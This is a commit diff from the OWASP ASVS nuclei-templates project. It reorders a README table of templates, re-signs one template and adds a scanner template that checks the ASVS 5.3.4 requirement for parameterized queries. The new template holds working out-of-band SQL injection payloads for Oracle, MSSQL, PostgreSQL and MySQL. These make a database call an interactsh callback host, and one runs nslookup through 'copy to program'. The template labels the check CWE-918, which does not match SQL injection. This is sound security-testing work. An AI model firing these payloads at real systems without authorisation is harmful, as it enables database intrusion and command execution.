Create 5.3.4.yaml - OOB SQLi check

README.md

@@ -39,23 +39,24 @@ The project current core team are:
 <tr><th>Template Name</th><th>Vulnerable Page</th><th>Template Name</th><th>Vulnerable Page</th></tr>
 <tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/headless/2.1.11.yaml">2.1.11</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_2_1_11">✔️</a></td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/3.1.1.yaml">3.1.1</a></td><td align='center'>❌</td></tr>
 <tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/3.4.1.yaml">3.4.1</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/3.4.2.yaml">3.4.2</a></td><td align='center'>❌</td></tr>
-<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/5.1.2.yaml">5.1.2</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/5.1.5.yaml">5.1.5</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_5_1_5">✔️</a></td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/5.1.5.yaml">5.1.5</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_5_1_5">✔️</a></td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/5.1.2.yaml">5.1.2</a></td><td align='center'>❌</td></tr>
 <tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/5.1.1.yaml">5.1.1</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/dast/5.2.5.1.yaml">5.2.5.1</a></td><td align='center'>❌</td></tr>
 <tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/dast/5.2.1.yaml">5.2.1</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/dast/5.2.6.yaml">5.2.6</a></td><td align='center'>❌</td></tr>
-<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/dast/5.3.3.2.yaml">5.3.3.2</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/dast/5.3.9.yaml">5.3.9</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_9">✔️</a></td></tr>
-<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/headless/5.3.3.1.yaml">5.3.3.1</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/dast/5.5.2.yaml">5.5.2</a></td><td align='center'>❌</td></tr>
-<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/8.2.1.yaml">8.2.1</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/9.1.3.yaml">9.1.3</a></td><td align='center'>❌</td></tr>
-<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/9.1.2.yaml">9.1.2</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/12.1.1.yaml">12.1.1</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_12_1_1">✔️</a></td></tr>
-<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/code/12.1.1.2.yaml">12.1.1.2</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/dast/12.3.3.yaml">12.3.3</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3">✔️</a></td></tr>
-<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/dast/12.6.1.yaml">12.6.1</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1">✔️</a></td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/headless/13.1.3.yaml">13.1.3</a></td><td align='center'>❌</td></tr>
-<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/13.2.2.yaml">13.2.2</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_13_2_2">✔️</a></td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/13.2.3.yaml">13.2.3</a></td><td align='center'>❌</td></tr>
-<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/13.2.1.yaml">13.2.1</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/13.3.1.yaml">13.3.1</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_13_3_1">✔️</a></td></tr>
-<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/headless/14.2.3.yaml">14.2.3</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/workflows/14.3.2.yaml">14.3.2</a></td><td align='center'>❌</td></tr>
-<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.4.3.yaml">14.4.3</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.4.2.yaml">14.4.2</a></td><td align='center'>❌</td></tr>
-<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.4.5.yaml">14.4.5</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.4.6.yaml">14.4.6</a></td><td align='center'>❌</td></tr>
-<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.4.4.yaml">14.4.4</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.4.7.yaml">14.4.7</a></td><td align='center'>❌</td></tr>
-<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.4.1.yaml">14.4.1</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.5.3.yaml">14.5.3</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_14_5_3">✔️</a></td></tr>
-<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.5.1.yaml">14.5.1</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.5.2.yaml">14.5.2</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_14_5_2">✔️</a></td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/dast/5.3.4.yaml">5.3.4</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/dast/5.3.3.2.yaml">5.3.3.2</a></td><td align='center'>❌</td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/dast/5.3.9.yaml">5.3.9</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_9">✔️</a></td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/headless/5.3.3.1.yaml">5.3.3.1</a></td><td align='center'>❌</td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/dast/5.5.2.yaml">5.5.2</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/8.2.1.yaml">8.2.1</a></td><td align='center'>❌</td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/9.1.2.yaml">9.1.2</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/9.1.3.yaml">9.1.3</a></td><td align='center'>❌</td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/12.1.1.yaml">12.1.1</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_12_1_1">✔️</a></td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/code/12.1.1.2.yaml">12.1.1.2</a></td><td align='center'>❌</td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/dast/12.3.3.yaml">12.3.3</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3">✔️</a></td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/dast/12.6.1.yaml">12.6.1</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1">✔️</a></td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/headless/13.1.3.yaml">13.1.3</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/13.2.2.yaml">13.2.2</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_13_2_2">✔️</a></td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/13.2.3.yaml">13.2.3</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/13.2.1.yaml">13.2.1</a></td><td align='center'>❌</td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/13.3.1.yaml">13.3.1</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_13_3_1">✔️</a></td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/headless/14.2.3.yaml">14.2.3</a></td><td align='center'>❌</td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/workflows/14.3.2.yaml">14.3.2</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.4.7.yaml">14.4.7</a></td><td align='center'>❌</td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.4.2.yaml">14.4.2</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.4.5.yaml">14.4.5</a></td><td align='center'>❌</td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.4.1.yaml">14.4.1</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.4.4.yaml">14.4.4</a></td><td align='center'>❌</td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.4.6.yaml">14.4.6</a></td><td align='center'>❌</td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.4.3.yaml">14.4.3</a></td><td align='center'>❌</td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.5.2.yaml">14.5.2</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_14_5_2">✔️</a></td><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.5.3.yaml">14.5.3</a></td><td align='center'><a href="https://snbig.github.io/Vulnerable-Pages/ASVS_14_5_3">✔️</a></td></tr>
+<tr><td><a href="https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/dev/templates/14.5.1.yaml">14.5.1</a></td><td align='center'>❌</td></tr>
 
 </table>
 </center>

templates/9.1.3.yaml

@@ -45,4 +45,4 @@ ssl:
       - type: json
         json:
           - " .tls_version"
-# digest: 4a0a00473045022100e9b21b02ae9125583f10e19a1e815d94d5cef592ec721113260e5cb97505b98d022027b64c7e5534e024598f75de201fe965b7c2c5b770d6f3f78ed783d52551a6ee:236a7c23afe836fbe231d6e037cff444
+# digest: 4b0a004830460221008abed7c5325a8518c05263575c8c5e574b1884952b2e75974d2be504961a7b9102210089b15b5102cc68184167d1a5270d4ff06a018de0eed03289ea71ba7fad0a50e8:236a7c23afe836fbe231d6e037cff444

templates/dast/5.3.4.yaml

@@ -0,0 +1,52 @@
+id: ASVS-4-0-3-V5-3-4
+
+info:
+  name: ASVS 5.3.4 Check
+  author: AmirHossein Raeisi,snoopy
+  severity: critical
+  classification:
+    cwe-id: CWE-918
+  reference:
+    - https://portswigger.net/web-security/sql-injection/cheat-sheet
+  tags: asvs,5.3.4
+  description: |
+    Verify that data selection or database queries (e.g. SQL, HQL, ORM, NoSQL) use parameterized queries, ORMs, entity frameworks, or are otherwise protected from database injection attacks.
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method != "OPTIONS"'
+
+    payloads:
+      sqli:
+        - "SELECT EXTRACTVALUE(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM \"{{interactsh-url}}\"> %remote;]>'),'/l') FROM dual--"
+        - "SELECT UTL_INADDR.get_host_address('{{interactsh-url}}')--"
+        - "'; exec master..xp_dirtree '//{{interactsh-url}}/a'--"
+        - "copy (SELECT '') to program 'nslookup {{interactsh-url}}'--"
+        - "LOAD_FILE('\\\\{{interactsh-url}}\\a')-- -"
+        - "SELECT ... INTO OUTFILE '\\\\{{interactsh-url}}\a'-- -"
+
+    fuzzing:
+      - parts:
+          - query
+          - body
+          - header
+        type: postfix
+        mode: single
+        fuzz:
+          - "' UNION {{sqli}}"
+          - "\" UNION {{sqli}}"
+          - "' AND 1={{sqli}}"
+          - "\" AND 1={{sqli}}"
+          - " {{sqli}}"
+
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+          - "dns"
+# digest: 4a0a004730450220632cd0002707fa5eeab5d7da85b3d6df805fb7bdd3a08ab2a39dafd607838f0502210095b1a397d2139214ae6eb25d742841f7656107457299fe89dde949eb0fb64bc2:236a7c23afe836fbe231d6e037cff444